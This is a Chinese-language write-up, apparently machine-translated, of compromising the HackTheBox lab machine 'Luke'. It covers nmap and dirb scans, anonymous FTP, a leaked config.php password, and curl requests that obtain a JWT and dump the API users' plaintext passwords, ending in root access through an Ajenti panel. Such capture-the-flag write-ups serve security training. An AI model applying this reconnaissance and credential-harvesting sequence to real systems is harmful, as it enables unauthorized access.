关于npm:教你如何把HackTheBox里面的Luke干掉

36次阅读

共计 8589 个字符,预计需要花费 22 分钟才能阅读完成。

与平常一样,第一步是对主机进行 Nmap 辨认正在运行的服务:

`Nmap scan report for 10.10.10.137
Host is up (0.042s latency).
Not shown: 65464 closed ports, 66 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.13.75
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O
OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN
OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E
OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   40.68 ms 10.10.12.1
2   40.94 ms 10.10.10.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds` 

*   1
*   2
*   3
*   4
*   5
*   6
*   7
*   8
*   9
*   10
*   11
*   12
*   13
*   14
*   15
*   16
*   17
*   18
*   19
*   20
*   21
*   22
*   23
*   24
*   25
*   26
*   27
*   28
*   29
*   30
*   31
*   32
*   33
*   34
*   35
*   36
*   37
*   38
*   39
*   40
*   41
*   42
*   43
*   44
*   45
*   46
*   47
*   48
*   49
*   50
*   51
*   52
*   53

从该输入中咱们能够看到有很多凋谢的端口。我看到的第一个是 FTP,因为它容许匿名登录。

`root@kali:~/Documents/luke# ncftp 10.10.10.137
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.137...                                                                                                                                                                 
vsFTPd 3.0.3+ (ext.1) ready...
Logging in...                                                                                                                                                                                 
Login successful.
Logged in to 10.10.10.137.                                                                                                                                                                    
ncftp / > ls
webapp/
ncftp / > cd webapp/
Directory successfully changed.
ncftp /webapp > ls
for_Chihiro.txt
ncftp /webapp > cat for_Chihiro.txt 
Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of 
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! 

Derry  

ncftp /webapp >` 

*   1
*   2
*   3
*   4
*   5
*   6
*   7
*   8
*   9
*   10
*   11
*   12
*   13
*   14
*   15
*   16
*   17
*   18
*   19
*   20
*   21
*   22
*   23

如您所见,通过 FTP 托管了一个文件。这是给千寻人的 txt 文件。这仿佛是 FTP 上所有可用的货色。接下来,我决定移至端口 80。浏览至 10.10.10.137 以查看托管的内容。

向我介绍了根本的 Bootstrap 4 页。源代码中没有暗藏任何内容,页面外也没有链接。而后,我运行 dirb 来查找服务器上托管的其余目录和文件。

`root@kali:~/Documents/luke# dirb http://10.10.10.137

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/                                                                          
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)                                                            
==> DIRECTORY: http://10.10.10.137/js/                                                                           
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)                                                               
+ http://10.10.10.137/management (CODE:401|SIZE:381)                                                             
==> DIRECTORY: http://10.10.10.137/member/                                                                       
==> DIRECTORY: http://10.10.10.137/vendor/                                                                       
                                                                                                                 
---- Entering directory: http://10.10.10.137/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                 
---- Entering directory: http://10.10.10.137/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                 
---- Entering directory: http://10.10.10.137/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                 
---- Entering directory: http://10.10.10.137/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3` 

*   1
*   2
*   3
*   4
*   5
*   6
*   7
*   8
*   9
*   10
*   11
*   12
*   13
*   14
*   15
*   16
*   17
*   18
*   19
*   20
*   21
*   22
*   23
*   24
*   25
*   26
*   27
*   28
*   29
*   30
*   31
*   32
*   33
*   34
*   35
*   36
*   37
*   38
*   39
*   40
*   41
*   42
*   43

发现了目录的汇合。我还应用 dirbuster 从新扫描并找到了 /login.php 和 config.php。因为某种原因而被 dirb 抢走了。

当我浏览到 config.php 时,将返回以下内容:

`$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %sn". $conn -> error);` 

*   1

当初,咱们有了一个用户名和明码的根:Zk6heYCyv6ZE9Xcg。/ 治理是发现的其余重要外观之一。当您浏览至此时,将显示 HTTP 根本身份验证字段。目前在端口 80 上仿佛没有其余任何货色。因而,我随后移至端口 3000。

当您尝试连贯到它时,您会收到 JSON 响应:大概 3000 仿佛是托管 NodeJS 利用的主机。

`{"success":false,"message":"Auth token is not supplied"}` 

*   1

我在端口 3000 上运行 dirb 尝试查找其余内容。

`DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Aug 13 11:36:44 BST 2019
--------------------------------

http://10.10.10.137:3000
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/login/
/users/
/
/Login/
/users/admin/
/Users/
/Users/admin/
/users/Admin/
/Users/Admin/
/LogIn/
/LOGIN/


--------------------------------
--------------------------------` 

*   1
*   2
*   3
*   4
*   5
*   6
*   7
*   8
*   9
*   10
*   11
*   12
*   13
*   14
*   15
*   16
*   17
*   18
*   19
*   20
*   21
*   22
*   23
*   24
*   25
*   26

所有这些目录返回的 JSON 响应与原始目录十分类似,表明您须要进行身份验证。通过一番考察,我发现该应用程序正在应用 JSON Web 令牌。通过向身份验证服务器发送蕴含正确的用户名和明码的申请。服务器将应用令牌进行响应,而后能够应用令牌对应用程序进行身份验证。通过大量的试验和谬误后,我能够应用以下串行生成令牌申请:

`root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#` 

*   1
*   2

如您所见,我应用 CURL 将 POST 申请发送到 http://10.10.10.137:3000/login。POST 申请中蕴含在端口 80 上找到的用户名和明码。服务器以令牌明码响应。而后,我应用 curl 将令牌转发给应用程序。

`root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000
{"message":"Welcome admin !"}
root@kali:/#` 

*   1
*   2
*   3

发送后,服务器将显示音讯“欢送管理员!”。而后,我将同一令牌发送到与 dirb 找到的端口 3000 上的其余目录。

`root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/# 
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}` 

*   1
*   2
*   3
*   4
*   5

您能够看到 / users 目录响应了一个用户名。管理员,德里,尤里和多莉。/users / admin 目录以 Admin 的用户名和明码作为响应。管理员:WX5b7)> / rp $ U)FW。而后,我将令牌发送给 / users 中的 3 个用户。

`root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}` 

*   1
*   2
*   3
*   4
*   5
*   6

所以毕竟,我有 5 套凭证

  • Dory:5y:!xa = ybfe)/ QD
  • Yuri:bet @ tester87
  • Derry:rZ86wwLvx7jUxtch
  • Admin:WX5b7)> / rp $ U)FW
  • root:Zk6heYCyv6ZE9Xcg

我回到端口 80 上的 / 治理,顺次尝试了每个时间表。Derry 用户可能登录。从这里,咱们有一个目录,列出了 3 个不同的文件。Config.json,config.php 和 login.php。我关上 config.json 并显示以下内容:

您能够从此 JSON 输入中看到,咱们当初有了另一个 root 用户明码。而后,我持续摸索 8000 端口。

这是用于治理服务器的软件。我尝试应用后面的步骤中捕捉的 6 组替换登录。来自 config.json 的 root 登录名容许我登录到该页面。

而后在计算机上生成 Web 浏览器终端会话。有了该终端的拜访权限,我便能够将 user.txt 和 root.txt 都保存起来以实现计算机。

# cd /root 

正文完
 0